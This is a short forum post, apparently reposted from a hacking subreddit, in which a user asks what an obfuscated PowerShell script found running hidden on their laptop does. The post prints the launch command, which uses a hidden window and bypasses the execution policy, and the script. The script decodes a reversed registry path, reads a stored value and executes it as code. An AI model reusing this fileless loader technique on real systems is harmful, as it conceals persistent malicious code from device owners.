For the past week or two, I've noticed that my laptop has been overheating and running slowly. When I checked Task Manager, I saw that two PowerShell instances were using up around 80% of my RAM and CPU. At first, I ran the Windows antivirus scan, but it didn't detect any malicious files. So, I ignored it and just ended the instances whenever they appeared.
However, the problem persisted and I recently discovered that the PowerShell instances were running a script located at "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1". Here's the Powershell command:
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1"
The 68D1.tmp.ps1 file content:
$nAQtLXMOJiHutd=[ScriptBlock]; icm ($nAQtLXMOJiHutd::Create([string]::Join('', ((gp (([regex]::Matches('VQ3y9RP0iswodniW\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$.value}) -join '')).'9AfXBVLS' | % { [char]$ }))))
I don't know much about hacking, but it looks like some kind of base64 encoded text to me. I deleted the folder, but I'm curious about what this script does. If anyone has any insights, I'd appreciate it. Also, this is just my secondary laptop, so there aren't any important files on it, just some study notes and lectures. Thank you!
[link] [comments]
from hacking: security in practice https://ift.tt/SUdop2n
Comments
Post a Comment